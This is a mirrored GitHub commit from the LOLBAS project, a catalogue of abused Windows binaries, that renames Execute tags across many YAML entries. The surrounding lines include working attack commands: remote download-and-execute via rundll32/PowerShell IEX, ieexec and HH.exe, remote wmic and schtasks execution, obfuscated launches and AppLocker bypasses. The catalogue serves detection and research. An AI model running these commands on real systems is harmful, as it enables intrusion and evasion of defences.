mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 22:39:27 +01:00
Various changes to Execute tags
This commit is contained in:
Wietze
parent
ab3ea8ff63
commit
089614e6a9
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetObjets
|
||||
- Execute: .NetObjects
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1053.002
|
||||
OperatingSystem: Windows 7 or older
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\WINDOWS\System32\At.exe
|
||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||
|
||||
@ -22,6 +22,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: INF
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: "conhost.exe --headless calc.exe"
|
||||
Description: Execute calc.exe with conhost.exe as parent process
|
||||
Usecase: Specify --headless parameter to hide child process window (if applicable)
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\conhost.exe
|
||||
Detection:
|
||||
|
||||
@ -13,6 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Application: GUI
|
||||
- Execute: EXE
|
||||
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
|
||||
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
|
||||
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
|
||||
@ -22,6 +23,7 @@ Commands:
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Application: GUI
|
||||
- Execute: .NetObjects
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\eventvwr.exe
|
||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||
|
||||
@ -11,8 +11,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: HH.exe c:\windows\system32\calc.exe
|
||||
Description: Executes calc.exe with HTML Help.
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Application: GUI
|
||||
Usecase: Execute process with HH.exe
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
@ -20,7 +21,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: HH.exe http://some.url/payload.chm
|
||||
- Application: GUI
|
||||
Description: Executes a remote payload.chm file which can contain commands.
|
||||
Usecase: Execute commands with HH.exe
|
||||
Category: Execute
|
||||
|
||||
@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: Remote
|
||||
- Execute: .NetEXE
|
||||
- Execute: EXE (.NET)
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: Remote
|
||||
- Execute: .NetEXE
|
||||
- Execute: EXE (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
|
||||
@ -12,8 +12,8 @@ Commands:
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: .NetEXE
|
||||
- Execute: DLL (.NET)
|
||||
- Execute: EXE (.NET)
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
@ -22,8 +22,8 @@ Commands:
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: .NetEXE
|
||||
- Execute: DLL (.NET)
|
||||
- Execute: EXE (.NET)
|
||||
- Command: InstallUtil.exe https://example.com/payload
|
||||
Description: It will download a remote payload and place it in INetCache.
|
||||
Usecase: Downloads payload from remote server
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Execute: JScript
|
||||
- Command: jsc.exe /t:library Library.js
|
||||
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Execute: JScript
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||
|
||||
@ -22,8 +22,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10S, Windows 11
|
||||
Tags:
|
||||
- Execute: VB.Net
|
||||
- Execute: Csharp
|
||||
- Execute: XOML
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||
Usecase: Compile and run code
|
||||
@ -32,8 +31,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10S, Windows 11
|
||||
Tags:
|
||||
- Execute: VB.Net
|
||||
- Execute: Csharp
|
||||
- Execute: XOML
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||
Code_Sample:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.014
|
||||
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: COM
|
||||
- Command: mmc.exe gpedit.msc
|
||||
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
|
||||
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
|
||||
@ -20,6 +20,8 @@ Commands:
|
||||
Privileges: Administrator
|
||||
MitreID: T1218.014
|
||||
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
- Command: msbuild.exe project.csproj
|
||||
Description: Build and execute a C# project stored in the target csproj file.
|
||||
Usecase: Compile and run code
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
|
||||
Description: Executes generated Logger DLL file with TargetLogger export
|
||||
Usecase: Execute DLL
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Execute: XSL
|
||||
- Command: msbuild.exe @sample.rsp
|
||||
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
|
||||
Usecase: Bypass command-line based detections
|
||||
|
||||
@ -51,6 +51,8 @@ Commands:
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: MSI
|
||||
- Execute: MST
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .Net DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
|
||||
|
||||
@ -22,15 +22,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||
Usecase: Execute code from Internet
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: JScript
|
||||
- Execute: Remote
|
||||
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
|
||||
Usecase: Proxy execution
|
||||
@ -40,15 +32,6 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: JScript
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: JScript
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
|
||||
Usecase: Execute code from Internet
|
||||
@ -75,8 +58,7 @@ Commands:
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: EXE
|
||||
- Execute: COM
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1053.005
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
|
||||
Description: Create a scheduled task on a remote computer for persistence/lateral movement
|
||||
Usecase: Create a remote task to run daily relative to the the time of creation
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1053.005
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SettingSyncHost.exe
|
||||
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10 1809, Windows Server 2019
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: ssh -o ProxyCommand=calc.exe .
|
||||
Description: Executes calc.exe from ssh.exe
|
||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\OpenSSH\ssh.exe
|
||||
Detection:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.012
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: COM
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\verclsid.exe
|
||||
- Path: C:\Windows\SysWOW64\verclsid.exe
|
||||
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
|
||||
Description: Execute evil.exe on the remote system.
|
||||
Usecase: Execute binary on a remote system
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Execute: Remote
|
||||
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
|
||||
Description: Create a volume shadow copy of NTDS.dit that can be copied.
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: COM
|
||||
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
|
||||
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
|
||||
Usecase: Run a com object created in registry to evade defensive counter measures
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: COM
|
||||
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
|
||||
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
|
||||
Usecase: Download file from Internet
|
||||
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
|
||||
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
|
||||
Usecase: Proxy execution of binary
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
|
||||
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
|
||||
Usecase: Proxy execution of binary
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
|
||||
Detection:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
|
||||
Detection:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: URL
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ieframe.dll
|
||||
- Path: c:\windows\syswow64\ieframe.dll
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: URL
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shdocvw.dll
|
||||
- Path: c:\windows\syswow64\shdocvw.dll
|
||||
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: URL
|
||||
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Description: Launch an executable by calling OpenURL.
|
||||
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
|
||||
Code_Sample:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
||||
|
||||
@ -12,7 +12,6 @@ Commands:
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1216.002
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
|
||||
Detection:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
|
||||
Code_Sample:
|
||||
|
||||
@ -32,8 +32,7 @@ Commands:
|
||||
MitreID: T1220
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Execute: Remote
|
||||
- Execute: XSL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\winrm.vbs
|
||||
- Path: C:\Windows\SysWOW64\winrm.vbs
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
|
||||
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
|
||||
Usecase: Local execution of managed code to bypass AppLocker.
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
|
||||
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
|
||||
Usecase: Execute a provided EXE
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
|
||||
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
|
||||
Code_Sample:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7 and up with VS/VScode installed
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
|
||||
Description: The above binary will execute other binary.
|
||||
Usecase: Execute any binary with given arguments.
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7 and up with VS/VScode installed
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: 'c:\windows\system32\devtoolslauncher.exe'
|
||||
Code_Sample:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Code_Sample:
|
||||
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with .NET installed
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: dotnet.exe [PATH_TO_DLL]
|
||||
Description: dotnet.exe will execute any DLL.
|
||||
Usecase: Execute DLL
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with .NET installed
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: dotnet.exe fsi
|
||||
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
|
||||
Usecase: Execute arbitrary F# code
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 and up with .NET SDK installed
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
|
||||
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
|
||||
Usecase: Execute code bypassing AWL
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 and up with .NET Core installed
|
||||
Tags:
|
||||
- Execute: CSProj
|
||||
- Execute: CSharp
|
||||
